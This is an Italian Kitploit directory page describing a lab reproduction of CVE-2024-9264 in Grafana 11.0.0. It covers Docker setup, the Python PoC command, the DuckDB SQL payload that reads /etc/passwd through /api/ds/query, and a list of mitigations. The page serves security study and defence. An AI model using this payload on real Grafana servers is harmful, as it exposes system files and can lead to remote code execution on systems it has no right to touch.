Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-9264 — PoC exploit per CVE-2024-9264: vulnerabilità dell'espressione SQL di Grafana che consente l'inclusione di file locali e l'esecuzione di codice remoto tramite SQL injection in DuckDB. Include configurazione del laboratorio Docker e script exploit Python. | Kitploit
Strumenti/GitHubGitHub/yeonchoda/cve-2024-9264
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubyeonchoda/cve-2024-9264

CVE-2024-9264

PoC exploit per CVE-2024-9264: vulnerabilità dell'espressione SQL di Grafana che consente l'inclusione di file locali e l'esecuzione di codice remoto tramite SQL injection in DuckDB. Include configurazione del laboratorio Docker e script exploit Python.

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-9264

Documenti di riferimento https://github.com/vulhub/vulhub/tree/master/grafana/CVE-2024-9264

1. Riepilogo della vulnerabilità

ElementoDescrizione
CVECVE-2024-9264
TargetGrafana (SQL Expressions)
ImpattoLocal File Inclusion (LFI), Remote Code Execution (RCE)
GravitàCritico (CVSS 9.9)
Condizioni d'attaccoUtente autenticato (privilegi di Admin)
Metodo d'attaccoAbuso della funzionalità SQL Expression per eseguire DuckDB SQL

Grafana è uno strumento di monitoraggio open source che visualizza vari dati provenienti da server, applicazioni, database, ecc., sotto forma di grafici o dashboard facili da leggere.

CVE-2024-9264 è una vulnerabilità che si verifica nella funzionalità SQL Expressions di Grafana.

Poiché DuckDB SQL utilizzato internamente da Grafana non viene convalidato adeguatamente, un attaccante può eseguire DuckDB SQL arbitrario tramite SQL Expression.

Ciò consente di:

  • Leggere file locali del server (LFI)
  • Eseguire comandi di sistema (RCE)
  • Divulgare informazioni sensibili

In questo laboratorio, dopo aver eseguito Grafana 11.0.0 in ambiente Docker, abbiamo riprodotto la vulnerabilità utilizzando un PoC per leggere il file /etc/passwd.


2. Configurazione dell'ambiente

Ambiente di laboratorio

ConfigurazioneDescrizione
SOUbuntu
DockerDocker Compose
Grafana11.0.0

Download del repository

root@kitploit:~
git clone https://github.com/yeonchoda/CVE-2024-9264
cd CVE-2024-9264

Esecuzione di Docker

root@kitploit:~
docker-compose up

Verifica dell'esecuzione di Grafana

root@kitploit:~
http://localhost:3000

Esecuzione di Grafana

Le credenziali predefinite di Grafana sono le seguenti.

root@kitploit:~
ID : admin
PW : admin

3. Condizioni di vulnerabilità

Affinché la vulnerabilità si verifichi, devono essere soddisfatte le seguenti condizioni.

  • Utilizzo di una versione vulnerabile di Grafana
  • Funzionalità SQL Expressions disponibile
  • L'attaccante può accedere a Grafana
  • DuckDB SQL Expression è abilitato

In questo laboratorio è stato utilizzato l'account amministratore predefinito (admin/admin).


4. Riproduzione

Esecuzione del PoC

Per leggere un file locale è stato eseguito il seguente comando.

root@kitploit:~
python3 PoC.py -u http://localhost:3000 -f "/etc/passwd"

Il PoC crea la seguente SQL Expression.

root@kitploit:~
SELECT * FROM read_csv_auto('/etc/passwd')

Questa viene inviata all'API /api/ds/query di Grafana.


Verifica del risultato

Grafana ha eseguito la SQL così com'è, restituendo nella risposta il contenuto di /etc/passwd.

Esecuzione di PoC.py

Oltre al file /etc/passwd è possibile leggere anche altri file. /etc/group output

Ciò conferma che il Local File Inclusion è stato eseguito con successo.


5. Codice PoC

Il PoC è scritto in Python ed esegue i seguenti passaggi.

  1. Chiamata all'API di Grafana (/api/ds/query)
  2. Creazione di una SQL Expression
  3. Invio della richiesta in formato JSON
  4. Parsing della risposta (JSON)
  5. Stampa del contenuto del file

La SQL generata per la lettura del file è la seguente.

root@kitploit:~
sql_query = f"SELECT * FROM read_csv_auto('{args.file}')"

La richiesta API viene eseguita come segue.

root@kitploit:~
response = requests.post(
    api_url,
    auth=(username, password),
    headers=headers,
    data=json.dumps(payload),
    verify=False
)

Questo può essere verificato anche con il comando curl. curl

6. Misure di mitigazione

1. Aggiornamento all'ultima versione di Grafana

La misura più efficace è aggiornare all'ultima versione in cui la vulnerabilità è stata corretta.


2. Limitazione della funzionalità SQL Expressions

Disabilitare le funzionalità SQL Expressions non necessarie o applicare il principio del minimo privilegio per limitarne l'ambito di utilizzo.


3. Protezione degli account amministratore

  • Modificare l'account predefinito (admin/admin)
  • Utilizzare password complesse
  • Ridurre al minimo il numero di account amministratore

Conclusione

Dopo aver configurato Grafana 11.0.0 in ambiente Docker, è stata riprodotta la vulnerabilità CVE-2024-9264.

Utilizzando un PoC scritto in Python, è stato possibile abusare della funzionalità SQL Expression e leggere con successo il file /etc/passwd. Ciò dimostra che, in assenza di una corretta convalida dell'input nelle SQL Expression, possono essere esposti file sensibili e, a seconda dell'ambiente, ciò può portare anche all'esecuzione remota di codice. Tali vulnerabilità possono essere prevenute tramite misure di sicurezza come l'aggiornamento all'ultima versione, la limitazione della funzionalità SQL Expression e la protezione degli account amministratore.

Scarica lo strumento